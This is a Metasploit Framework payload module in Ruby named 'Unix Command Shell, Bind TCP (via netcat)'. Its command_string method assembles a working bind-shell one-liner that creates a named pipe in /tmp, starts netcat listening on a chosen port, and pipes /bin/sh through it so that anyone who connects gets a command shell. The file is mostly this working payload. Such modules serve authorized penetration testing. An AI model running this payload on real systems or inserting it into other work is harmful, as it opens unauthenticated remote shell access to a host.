1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = :dynamic
8

9
  include Msf::Payload::Single
10
  include Msf::Sessions::CommandShellOptions
11

12
  def initialize(info = {})
13
    super(
14
      merge_info(
15
        info,
16
        'Name' => 'Unix Command Shell, Bind TCP (via netcat)',
17
        'Description' => 'Listen for a connection and spawn a command shell via netcat',
18
        'Author' => [
19
          'm-1-k-3',
20
          'egypt',
21
          'juan vazquez'
22
        ],
23
        'License' => MSF_LICENSE,
24
        'Platform' => 'unix',
25
        'Arch' => ARCH_CMD,
26
        'Handler' => Msf::Handler::BindTcp,
27
        'Session' => Msf::Sessions::CommandShell,
28
        'PayloadType' => 'cmd',
29
        'RequiredCmd' => 'netcat',
30
        'Payload' => {
31
          'Offsets' => {},
32
          'Payload' => ''
33
        }
34
      )
35
    )
36
    register_advanced_options(
37
      [
38
        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
39
        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
40
      ]
41
    )
42
  end
43

44
  #
45
  # Constructs the payload
46
  #
47
  def generate(_opts = {})
48
    vprint_good(command_string)
49
    return super + command_string
50
  end
51

52
  #
53
  # Returns the command string to use for execution
54
  #
55
  def command_string
56
    backpipe = Rex::Text.rand_text_alpha_lower(4..7)
57
    "mkfifo /tmp/#{backpipe}; (#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} ||#{datastore['NetcatPath']} -l #{datastore['LPORT']})0</tmp/#{backpipe} | #{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
58
  end
59
end
60

61